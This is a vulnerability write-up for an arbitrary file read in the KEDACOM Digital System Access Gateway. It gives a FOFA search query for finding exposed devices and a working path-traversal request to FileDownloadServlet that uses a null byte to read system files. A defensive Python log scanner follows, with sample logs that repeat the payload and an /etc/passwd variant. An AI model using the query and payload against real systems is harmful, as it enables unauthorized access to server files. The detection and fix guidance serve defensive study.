# KEDACOM Digital System Access Gateway Arbitrary File Read Vulnerability

### Vulnerability Description <a href="#lou-dong-miao-shu" id="lou-dong-miao-shu"></a>

The KEDACOM Digital System Access Gateway (数字系统接入网关) has an arbitrary file read vulnerability: by crafting a request, an attacker can read arbitrary files on the server.

### Affected Products <a href="#lou-dong-ying-xiang" id="lou-dong-ying-xiang"></a>


KEDACOM Digital System Access Gateway (数字系统接入网关)

### FOFA <a href="#fofa" id="fofa"></a>


```
(app="KEDACOM-DVR接入网关") && (is_honeypot=false && is_fraud=false)
```

### Vulnerability Reproduction <a href="#lou-dong-fu-xian" id="lou-dong-fu-xian"></a>

The login page looks like this:

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-MhqyJJ9XxS7ijApYFN8%2F-MhqzpI2VW1ya113h5FO%2Fimage.png?alt=media\&token=386912fc-377f-42b3-8657-39344e6a6d6b)

Use the POC to read /etc/hosts:

```
/gatewayweb/FileDownloadServlet?fileName=test.txt&filePath=../../../../../../../../../../Windows/System32/drivers/etc/hosts%00.jpg&type=2
```

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-MhqyJJ9XxS7ijApYFN8%2F-Mhqzt2kBBMU64AXmMqv%2Fimage.png?alt=media\&token=48ce5693-e92a-4638-86d7-6f2bfc744432)
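As an added example (not part of the original writeup and not KEDACOM code), the following Python routine shows how a defender can detect attempts like the one above in web-server access logs. It parses combined-format log lines, fully percent-decodes the `filePath` parameter of requests to `FileDownloadServlet` (so double encoding such as `%252e` is also caught), and flags values that contain a null byte or that resolve outside the intended download directory after `..` segments are collapsed. The log lines embedded below are constructed samples, not real traffic; the log format and the parameter names are assumptions based on the POC shown on the page.

```python
import re
from posixpath import normpath
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (combined format); not real traffic.
# Line 2 mirrors the page's POC, line 3 is a percent-encoded variant,
# lines 1 and 4 are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Aug/2021:10:01:02 +0800] "GET /gatewayweb/FileDownloadServlet?fileName=report.pdf&filePath=reports/2021&type=2 HTTP/1.1" 200 5120
10.0.0.9 - - [12/Aug/2021:10:02:17 +0800] "GET /gatewayweb/FileDownloadServlet?fileName=test.txt&filePath=../../../../../../../../../../Windows/System32/drivers/etc/hosts%00.jpg&type=2 HTTP/1.1" 200 824
10.0.0.9 - - [12/Aug/2021:10:02:40 +0800] "GET /gatewayweb/FileDownloadServlet?fileName=a&filePath=%2e%2e%2f%2e%2e%2fetc%2fpasswd&type=2 HTTP/1.1" 200 1311
10.0.0.7 - - [12/Aug/2021:10:03:05 +0800] "GET /gatewayweb/login.jsp HTTP/1.1" 200 2048
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Servlet path assumed from the POC on the page.
SERVLET_SUFFIX = "/FileDownloadServlet"


def decode_param(value: str) -> str:
    """Percent-decode until the value stops changing, defeating double encoding."""
    prev = None
    while prev != value:
        prev, value = value, unquote(value)
    return value


def classify_request(target: str) -> list:
    """Return a list of findings for one request target; empty when benign."""
    parts = urlsplit(target)
    if not parts.path.endswith(SERVLET_SUFFIX):
        return []
    qs = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    for raw in qs.get("filePath", []):
        decoded = decode_param(raw)
        if "\x00" in decoded:
            # Null-byte truncation of an extension check (the ".jpg" trick in the POC).
            findings.append("null byte in filePath")
        # Treat backslashes as separators, drop anything after a null byte,
        # then collapse '.' and '..' segments. A result that still starts with
        # '..', '/', or a drive letter escapes the download directory.
        cleaned = decoded.split("\x00", 1)[0].replace("\\", "/")
        norm = normpath(cleaned)
        if norm == ".." or norm.startswith("../") or norm.startswith("/") \
                or re.match(r"^[A-Za-z]:", norm):
            findings.append("path traversal in filePath")
    return findings


def scan_log(text: str) -> list:
    """Return (ip, timestamp, findings) for each suspicious download request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify_request(m["target"])
        if findings:
            hits.append((m["ip"], m["ts"], sorted(set(findings))))
    return hits


if __name__ == "__main__":
    for ip, ts, findings in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip}: {', '.join(findings)}")
```

The same `classify_request` check, applied server-side before opening the file, is the shape of the fix: decode once, reject null bytes, canonicalise the requested path against the download root, and refuse anything that resolves outside it. Matching on the literal string `../` alone is not enough, as the percent-encoded variant in the sample log shows.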
